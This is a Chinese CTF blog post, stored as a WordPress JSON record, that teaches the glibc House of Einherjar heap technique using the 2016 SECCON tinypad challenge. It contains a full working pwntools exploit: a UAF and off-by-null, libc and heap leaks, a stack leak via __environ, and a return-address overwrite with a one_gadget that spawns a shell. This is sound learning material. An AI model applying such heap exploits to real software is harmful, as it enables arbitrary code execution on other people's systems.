{"id":529,"date":"2024-12-21T21:40:28","date_gmt":"2024-12-21T13:40:28","guid":{"rendered":"http:\/\/8.141.27.105\/?p=529"},"modified":"2025-01-20T16:36:23","modified_gmt":"2025-01-20T08:36:23","slug":"pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/21\/pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89\/","title":{"rendered":"PWN|House Of \u7cfb\u5217\uff08\u6301\u7eed\u66f4\u65b0\uff09"},"content":{"rendered":"\n<p>\u5728\u5b66\u4e60\u4e86unlink\u3001chunk extend\u3001\u5404\u79cdbin attack\u7b49\u57fa\u7840\u653b\u51fb\u6280\u672f\u540e\uff0c\u5f00\u59cb\u8fdb\u5165House Of\u7cfb\u5217\u7684\u5b66\u4e60\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/21\/pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89\/#House_Of_Einherjar\" title=\"House Of Einherjar\">House Of Einherjar<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/21\/pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89\/#House_of_Force\" title=\"House of Force\">House of Force<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/21\/pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89\/#House_of_Rabbit\" title=\"House of Rabbit\">House of Rabbit<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/21\/pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89\/#House_of_Lore\" title=\"House of Lore\">House of Lore<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/21\/pwn%e5%a0%86%e5%88%a9%e7%94%a8house-of-%e7%b3%bb%e5%88%97%ef%bc%88%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%ef%bc%89\/#House_of_Spirit\" title=\"House of Spirit\">House of Spirit<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"House_Of_Einherjar\"><\/span>House Of Einherjar<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u501f\u9274\u6587\u7ae0\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/heap\/ptmalloc2\/house-of-einherjar\/#2016-seccon-tinypad\">House Of Einherjar &#8211; CTF Wiki<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/yms0211\/article\/details\/127051305\">2016 Seccon tinypad-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p>House of Einherjar\uff0c\u539f\u7406\u662f\u901a\u8fc7\u4f2a\u9020\u4e00\u4e2achunk\uff08\u8bb0\u4e3achunk0\uff09\u7684prevsize\u548cprev inuse\u4f4d\uff0c\u7136\u540e\u5c06\u5176free\u6389\uff0c\u5728free\u65f6\u68c0\u6d4b\u5230prev inuse\u4e3a0\u5c31\u4f1a\u89e6\u53d1\u5411\u524d\u5408\u5e76\uff0c\u5408\u5e76\u524d\u4f1a\u5148\u5224\u65ad\u524d\u9762\u504f\u79fb\u4e3apresize\u5927\u5c0f\u7684\u5730\u65b9\u662f\u5426\u6709\u6b63\u786e\u7684chunk\uff08\u8bb0\u4e3afake chunk\uff09fake chunk\u7684size\u5927\u5c0f\u8981\u8ddfchunk0\u7684prevsize\u4e00\u81f4\uff0c\u7136\u540e\u5bf9fake chunk\u6267\u884cunlink\u64cd\u4f5c\u8131\u94fe\uff0c\u6240\u4ee5\u4f2a\u9020fake chunk\u8fd8\u5f97\u7ed5\u8fc7\u8131\u94fe\u68c0\u6d4b\u3002\u5982\u679c\u4f2a\u9020\u7684fake chunk\u6210\u529f\u7ed5\u8fc7\u68c0\u6d4b\uff0cfake chunk\u548cchunk0\u4ee5\u53ca\u4e2d\u95f4\u5939\u7740\u6240\u6709\u5185\u5b58\u533a\u57df\u5c31\u90fd\u4f1a\u5408\u5e76\u6210\u4e00\u4e2achunk\u7136\u540e\u653e\u8fdbunsorted bin\u91cc\u9762\uff0c\u8fd9\u65f6\u5019\u518d\u7533\u8bf7\u5c31\u80fd\u8fd4\u56defake chunk\u4f4d\u7f6e\u7684chunk\uff0c\u5b9e\u73b0\u4e86\u4efb\u610f\u5730\u5740\u5199\u3002<\/p>\n\n\n\n<p>fakechunk\u7684\u6784\u9020\u6a21\u677f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = p64(0) + p64(size) + p64(fakechunk_addr) * 2<\/code><\/pre>\n\n\n\n<p>\u66f4\u5177\u4f53\u7684\u539f\u7406\u53ef\u4ee5\u53c2\u8003<a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/heap\/ptmalloc2\/house-of-einherjar\/#2016-seccon-tinypad\">House Of Einherjar &#8211; CTF Wiki<\/a>\uff0c\u8bb2\u7684\u6bd4\u6211\u597d\u5f88\u591a\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u9898  2016 Seccon tinypad<\/p>\n\n\n\n<p>\u4f8b\u9898\u8d44\u6e90\uff1a<a href=\"https:\/\/github.com\/ctf-wiki\/ctf-challenges\/tree\/master\/pwn\/heap\/house-of-einherjar\/2016_seccon_tinypad\">ctf-challenges\/pwn\/heap\/house-of-einherjar\/2016_seccon_tinypad at master \u00b7 ctf-wiki\/ctf-challenges \u00b7 GitHub<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u6709add\uff0cedit\uff0cdelete\u3002\u53ea\u80fdadd\u56db\u4e2a\uff0c\u7528\u6237\u81ea\u5b9a\u4e49size\u548ccontent\uff0ctinypad+256\u5904\u5f00\u59cb\u5b58\u653e\u7ed3\u6784\u4f53\uff0c\u4e00\u4e2a\u7ed3\u6784\u4f53\u6709\u4e24\u6210\u5458\uff08\u4e24\u4e2a\u516b\u5b57\u8282\uff09\uff0c\u7b2c\u4e00\u4e2a\u516b\u5b57\u8282\u5b58\u653e\u5806\u7684size\uff0c\u7b2c\u4e8c\u4e2a\u516b\u5b57\u8282\u5b58\u653econtent\u7684chunk\u5730\u5740\uff0cchunk\u5927\u5c0f\u662fmalloc(size)\u3002\u5982\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/H4ZCR4EIZ1XC1D5M.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"681\" height=\"485\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/H4ZCR4EIZ1XC1D5M.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-532\"  sizes=\"auto, (max-width: 681px) 100vw, 681px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u90a3\u4e48tinypad\u524d\u9762256\u4e2a\u5b57\u8282\u662f\u5e72\u4ec0\u4e48\u7684\u5462\uff1fedit\u51fd\u6570\u4f1a\u7528\u5230\u3002\u672c\u9898edit\u6709\u70b9\u7279\u6b8a\uff0c\u4e0d\u662f\u76f4\u63a5\u5f80content chunk\u91cc\u9762\u5199\uff0c\u800c\u662f\u5148\u5f80tinypad\u524d256\u5b57\u8282\u91cc\u9762\u5199\uff0c\u7136\u540e\u7528strcpy\u590d\u5236\u5230content chunk\u91cc\uff0c\u5b58\u5728off by null\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/8@K2M3516LL2INXHX.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"909\" height=\"790\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/8@K2M3516LL2INXHX.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-533\"  sizes=\"auto, (max-width: 909px) 100vw, 909px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>delete\u51fd\u6570\u5148\u628acontent chunk\u6307\u9488free\u6389\uff0c\u7136\u540e\u628a\u524d\u9762\u7684size\u6e05\u96f6\uff0c\u6240\u4ee5\u6709UAF\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/TYFSQJEBX706Z7JAM.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"980\" height=\"335\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/TYFSQJEBX706Z7JAM.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-534\"  sizes=\"auto, (max-width: 980px) 100vw, 980px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u6240\u4ee5\u6709UAF\u548coff by null\uff0c\u5e76\u4e14\u7a0b\u5e8f\u4f1a\u5728\u6bcf\u4e00\u6b65\u7ed3\u675f\u540e\u628achunk\u5185\u5bb9\u6253\u5370\u51fa\u6765\u3002\u601d\u8def\u662f\uff0c\u901a\u8fc7UAF\u6765\u6cc4\u9732libc\u57fa\u5740\u548c\u5806\u5730\u5740\uff0c\u7136\u540e\u6253house of einherjar\uff0c\u63a7\u5236\u5806\u6307\u9488\u4e3amalloc_hook\u6216\u8005free_hook\uff0c\u6700\u540eedit\u5199\u5165one_gadget\u3002<\/p>\n\n\n\n<p>\u6cc4\u9732\uff1a<\/p>\n\n\n\n<p>\u6ce8\u610f\u5728\u6cc4\u9732\u5806\u5730\u5740\u65f6\u5019\u5f97\u5148free2\u518dfree1\uff0c\u56e0\u4e3achunk1\u7684\u5806\u5730\u5740\u4e5f\u5c31\u662f\u5806\u7684\u57fa\u5730\u5740\uff0c\u901a\u5e38\u4ee5\\x00\u7ed3\u5c3e\uff0c\u5982\u679c\u6cc4\u9732\u7684\u662fchunk1\u5730\u5740\u7684\u8bdd\u4f1a\u56e0\u4e3a\\x00\u622a\u65ad\u5bfc\u81f4\u4ec0\u4e48\u90fd\u6ca1\u6709\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>create(0x40,b'a'*0x40) #chunk1\ncreate(0x40,b'b'*0x40) #chunk2\ncreate(0x80,b'c'*0x80) #chunk3\ncreate(0xf0,b'd'*0xf0) #chunk4\n\n#unsorted bin leak and get libc_base\nfree(3)\nio.recvuntil(\"#   INDEX: 3\\n\")\nio.recvuntil(\"# CONTENT: \")\nunsortedbin_addr = u64(io.recv(6).ljust(8,b'\\x00'))\nprint(hex(unsortedbin_addr))\nmain_arena = unsortedbin_addr - 88\nlibc_base = main_arena - 0x3C3B20\nprint(hex(libc_base))\n\n#fast bin leak and get heap_base\nfree(2)\nfree(1)\nio.recvuntil(\"#   INDEX: 1\\n\")\nio.recvuntil(\"# CONTENT: \")\nheap_addr = u64(io.recv(4).ljust(8,b'\\x00'))\nprint(hex(heap_addr))\n#gdb.attach(io)\nheap_base = heap_addr - 0x50\nprint(hex(heap_base))<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u7136\u540e\u5c31\u662fhouse of einherjar\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#house of einherjar\n#fakechunk\u9009\u5728tinypad+0x20\u7684\u5730\u65b9\uff0c\u56e0\u4e3a\u6700\u5927\u8f93\u5165\u662f256B\uff0c\u5f97+0x20\u624d\u80fd\u63a7\u5236\u5230chunk1\u7684\u6307\u9488\u3002\nfakerchunk = b'a'*0x20 + p64(0) + p64(0x101) + p64(heap_arr+0x20) + p64(heap_arr+0x20)\n\n#\u8ba1\u7b97\u504f\u79fb\noffset = heap_base - heap_arr\n\n#\u4e0a\u9762\u7684\u6b65\u9aa4\u628a1\u30012\u30013\u90fdfree\u4e86\uff0c\u73b0\u5728\u628a4\u4e5ffree\u4e86\uff0c\u91cd\u65b0\u7533\u8bf7\u56db\u4e2a\u518d\u5f00\u59cb\u4e0b\u4e00\u6b65\u3002\nfree(4)\ncreate(0x18,b'a'*0x18)\ncreate(0xf0,b'b'*0xf0)\ncreate(0x100,b'c'*0xf8)\ncreate(0x100,b'd'*0x100)\n\n\n#\u7531\u4e8eedit\u51fd\u6570\u7684\u7279\u6b8a\uff0c\u4f1a\u628a\u5176\u4ed6\u5197\u4f59\u5b57\u7b26\u4e5f\u590d\u5236\u8fc7\u6765\uff0c\u6240\u4ee5\u5728\u4fee\u6539chunk2\u7684prevsize\u548cprev inuse\u65f6\u628a\u9ad8\u4f4d\u6e05\u96f6\uff0c\u786e\u4fddpresize\u6ca1\u6709\u522b\u7684\u5185\u5bb9,\nfor i in range(len(p64(offset))-len(p64(offset).strip(b'\\x00'))+1):\n    edit(1,b'a'*0x10+p64(offset).strip(b'\\x00').rjust(8-i,b'f'))\n\n\n#\u5229\u7528chunk2\u6765\u5728tinypad+0x20\u5904\u6784\u9020fakechunk,\u91ca\u653e\u540e\u68c0\u6d4b\u5230prev inuse\u4f4d\u4e3a0\uff0c\u7136\u540e\u5f80\u524d\u9762offset\u504f\u79fb\u7684\u5730\u65b9\u627e\uff0c\u627e\u5230\u4e86fakechunk\uff0c\u6210\u529f\u901a\u8fc7\u68c0\u6d4b\uff0c\u4e4b\u540eunlink fakechunk\uff0c\u5408\u5e76fakechunk-&gt;chunk2\uff0c\u4e00\u8d77\u6254\u5230unsorted bin\u91cc\u9762\u53bb\nedit(2,fakerchunk)\nfree(2)<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u4e0a\u9762\u7684\u6b65\u9aa4\uff0c\u5c31\u6210\u529f\u628afakechunk-&gt;chunk2\u6254\u5230unsorted bin\u91cc\u9762\u53bb\u4e86\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/PANT4C96LLYXNE5Y5R8HH.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"691\" height=\"304\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/PANT4C96LLYXNE5Y5R8HH.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-535\"  sizes=\"auto, (max-width: 691px) 100vw, 691px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u63a5\u4e0b\u6765\u5c31\u662fgetshell\uff0c\u4f46\u662f\u5230\u8fd9\u6709\u4e2a\u96be\u9898\uff1a\u56e0\u4e3a\u7a0b\u5e8f\u662f\u5229\u7528 strlen \u6765\u5224\u8bfb\u53ef\u4ee5\u8bfb\u53d6\u591a\u5c11\u957f\u5ea6\uff0c\u800c malloc_hook \u5219\u5728\u521d\u59cb\u65f6\u4e3a 0,\u6240\u4ee5\u65e0\u6cd5\u5f80\u91cc\u9762\u5199\u5165one gadget\u3002\u8fd9\u91cc\u7528\u4e00\u4e2a\u6211\u4e4b\u524d\u95fb\u6240\u672a\u95fb\u7684\u65b9\u6cd5\uff1a\u5229\u7528__environ\u3002<\/p>\n\n\n\n<p>\u539f\u7406\uff1a__environ\u7ed3\u6784\u7684\u7b2c\u4e00\u4e2a\u516b\u5b57\u8282\u8bb0\u5f55\u4e86\u4e00\u4e2a\u5730\u5740\uff0c\u8be5\u5730\u5740\u79bbmain\u51fd\u6570\u7684ret\u662f\u56fa\u5b9a\u76848*30\uff0c\u901a\u8fc7__environ\u6765\u6cc4\u9732\u6808\u5730\u5740\uff0c\u8ba1\u7b97ret\u5730\u5740\uff0c\u7136\u540e\u8986\u76d6chunk1\u6307\u9488\u4e3aret\u5730\u5740\uff0c\u5f80chunk1\uff0c\u5373ret\u5199\u5165one_gadget\uff0c\u6700\u540e\u9000\u51fa\u5373\u53efgetshell:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#getshell\n#\u8ba1\u7b97environ_addr\nenviron_addr = libc_base + libc.symbols&#91;'__environ']\nprint(hex(environ_addr))\n#gdb.attach(io)\n\n#\u4fee\u6539fakechunk\u7684fd\u548cbk\u4e3aunsortedbin_addr\uff0c\u786e\u4fdd\u80fd\u6210\u529f\u5206\u914d\u3002\npayload3 = b'a'*0x20 + p64(0) + p64(0x101) + p64(unsortedbin_addr) + p64(unsortedbin_addr)\nedit(3,payload3)\n#gdb.attach(io)\n\n#\u8986\u76d6chunk1\u6307\u9488\u4e3aenviron_addr\uff0c\u7136\u540eadd\u7ed3\u675f\u540e\u7a0b\u5e8f\u81ea\u52a8\u6253\u5370chunk1\u5185\u5bb9\uff0c\u6cc4\u9732environ\u7684\u503c\u3002\n#0xf0\u548c0x602148\u662f\u8986\u76d6\u5b58\u50a8chunk2\u7ed3\u6784\u4f53\u7684size\u6210\u5458\u548cchunk2\u6307\u9488\u6210\u5458\u7684\uff0c\u4e5f\u5c31\u662fchunk2\u6307\u9488\u88ab\u6307\u5411\u4e860x602148\uff0c\u5373\u5b58chunk1\u6307\u9488\u7684\u5730\u65b9\u3002\n\npayload4 = b'a'*0xd0 + p64(0x18) + p64(environ_addr) + p64(0xf0) + p64(0x602148)\ncreate(0xf0,payload4)\nio.recvuntil(\"#   INDEX: 1\\n\")\nio.recvuntil(\"# CONTENT: \")\nstack_addr = u64(io.recv(6).ljust(8,b'\\x00'))\nprint(hex(stack_addr))\nmain_ret = stack_addr - 8*30\n\n\n#\u8ba1\u7b97one_gadget\none_gadget = p64(libc_base + 0x4525a)\n\n\n#\u8986\u76d6chunk1\u6307\u9488\u4e3amain_ret\nedit(2,p64(main_ret))\n\n#\u4fee\u6539main_ret\u4e3aone_gadget\nedit(1,one_gadget)\n\n#\u9000\u51fa\u7a0b\u5e8f\uff0c\u89e6\u53d1one_gadget\nio.sendline(b'Q')\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext.log_level = 'info'\n\nio = process(\"\/home\/monke\/PWN\/house of enherjar\/tinypad\")\nelf = ELF(\"\/home\/monke\/PWN\/house of enherjar\/tinypad\")\nlibc = ELF(\"\/\/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_amd64\/libc-2.23.so\")\nheap_arr = 0x602040\n\ndef create(size,content):\n    io.recvuntil(\"(CMD)&gt;&gt;&gt; \")\n    io.sendline(b'A')\n    io.recvuntil(\"(SIZE)&gt;&gt;&gt; \")\n    io.sendline(str(size))\n    io.recvuntil(\"(CONTENT)&gt;&gt;&gt; \")\n    io.sendline(content)\ndef free(index):\n    io.recvuntil(\"(CMD)&gt;&gt;&gt; \")\n    io.sendline(b'D')\n    io.recvuntil(\"(INDEX)&gt;&gt;&gt; \")\n    io.sendline(str(index))\ndef edit(index,content):\n    io.recvuntil(\"(CMD)&gt;&gt;&gt; \")\n    io.sendline(b'E')\n    io.recvuntil(\"(INDEX)&gt;&gt;&gt; \")\n    io.sendline(str(index))\n    io.recvuntil(\"(CONTENT)&gt;&gt;&gt; \")\n    io.sendline(content)\n    io.recvuntil(\"(Y\/n)&gt;&gt;&gt; \")\n    io.sendline(b'Y')\n\ncreate(0x40,b'a'*0x40) #chunk1\ncreate(0x40,b'b'*0x40) #chunk2\ncreate(0x80,b'c'*0x80) #chunk3\ncreate(0xf0,b'd'*0xf0) #chunk4\n\n#unsorted bin leak and get libc_base\nfree(3)\nio.recvuntil(\"#   INDEX: 3\\n\")\nio.recvuntil(\"# CONTENT: \")\nunsortedbin_addr = u64(io.recv(6).ljust(8,b'\\x00'))\nprint(hex(unsortedbin_addr))\nmain_arena = unsortedbin_addr - 88\nlibc_base = main_arena - 0x3C3B20\nprint(hex(libc_base))\n\n#fast bin leak and get heap_base\nfree(2)\nfree(1)\nio.recvuntil(\"#   INDEX: 1\\n\")\nio.recvuntil(\"# CONTENT: \")\nheap_addr = u64(io.recv(4).ljust(8,b'\\x00'))\nprint(hex(heap_addr))\n#gdb.attach(io)\nheap_base = heap_addr - 0x50\nprint(hex(heap_base))\n\n\n#house of enherjar\nfakerchunk = b'a'*0x20 + p64(0) + p64(0x101) + p64(heap_arr+0x20) + p64(heap_arr+0x20)\n\noffset = heap_base - heap_arr\n\nfree(4)\ncreate(0x18,b'a'*0x18)\ncreate(0xf0,b'b'*0xf0)\ncreate(0x100,b'c'*0xf8)\ncreate(0x100,b'd'*0x100)\n\n\n#\u5728\u4fee\u6539chunk2\u7684prevsize\u548cprev inuse\u65f6\u628a\u9ad8\u4f4d\u6e05\u96f6\uff0c\u786e\u4fddpresize\u6ca1\u6709\u522b\u7684\u5185\u5bb9,\nfor i in range(len(p64(offset))-len(p64(offset).strip(b'\\x00'))+1):\n    edit(1,b'a'*0x10+p64(offset).strip(b'\\x00').rjust(8-i,b'f'))\n\n\n#\u5229\u7528chunk2\u6765\u5728tinypad+0x20\u5904\u6784\u9020fakechunk,\u91ca\u653e\u540e\u68c0\u6d4b\u5230prev inuse\u4f4d\u4e3a0\uff0c\u7136\u540e\u5f80\u524d\u9762offset\u504f\u79fb\u7684\u5730\u65b9\u627e\uff0c\u627e\u5230\u4e86fakechunk\uff0c\u6210\u529f\u901a\u8fc7\u68c0\u6d4b\uff0c\u4e4b\u540eunlink fakechunk\uff0c\u5408\u5e76fakechunk-&gt;chunk2\uff0c\u4e00\u8d77\u6254\u5230unsorted bin\u91cc\u9762\u53bb\nedit(2,fakerchunk)\nfree(2)\n\n#gdb.attach(io)\n\n#getshell\n#\u8ba1\u7b97environ_addr\nenviron_addr = libc_base + libc.symbols&#91;'__environ']\nprint(hex(environ_addr))\n#gdb.attach(io)\n\n#\u4fee\u6539fakechunk\u7684fd\u548cbk\u4e3aunsortedbin_addr\uff0c\u786e\u4fdd\u80fd\u6210\u529f\u5206\u914d\u3002\npayload3 = b'a'*0x20 + p64(0) + p64(0x101) + p64(unsortedbin_addr) + p64(unsortedbin_addr)\nedit(3,payload3)\n#gdb.attach(io)\n\n#\u8986\u76d6chunk1\u6307\u9488\u4e3aenviron_addr\uff0c\u7136\u540eadd\u7ed3\u675f\u540e\u7a0b\u5e8f\u81ea\u52a8\u6253\u5370chunk1\u5185\u5bb9\uff0c\u6cc4\u9732environ\u7684\u503c\u3002\n#0xf0\u548c0x602148\u662f\u8986\u76d6\u5b58\u50a8chunk2\u7ed3\u6784\u4f53\u7684size\u6210\u5458\u548cchunk2\u6307\u9488\u6210\u5458\u7684\uff0c\u4e5f\u5c31\u662fchunk2\u6307\u9488\u88ab\u6307\u5411\u4e860x602148\uff0c\u5373\u5b58chunk1\u6307\u9488\u7684\u5730\u65b9\u3002\n\npayload4 = b'a'*0xd0 + p64(0x18) + p64(environ_addr) + p64(0xf0) + p64(0x602148)\ncreate(0xf0,payload4)\nio.recvuntil(\"#   INDEX: 1\\n\")\nio.recvuntil(\"# CONTENT: \")\nstack_addr = u64(io.recv(6).ljust(8,b'\\x00'))\nprint(hex(stack_addr))\nmain_ret = stack_addr - 8*30\n\n\n#\u8ba1\u7b97one_gadget\none_gadget = p64(libc_base + 0x4525a)\n\n\n#\u8986\u76d6chunk1\u6307\u9488\u4e3amain_ret\nedit(2,p64(main_ret))\n\n#\u4fee\u6539main_ret\u4e3aone_gadget\nedit(1,one_gadget)\n\n#\u9000\u51fa\u7a0b\u5e8f\uff0c\u89e6\u53d1one_gadget\nio.sendline(b'Q')\n\nio.interactive()\n\n<\/code><\/pre>\n\n\n\n<h2 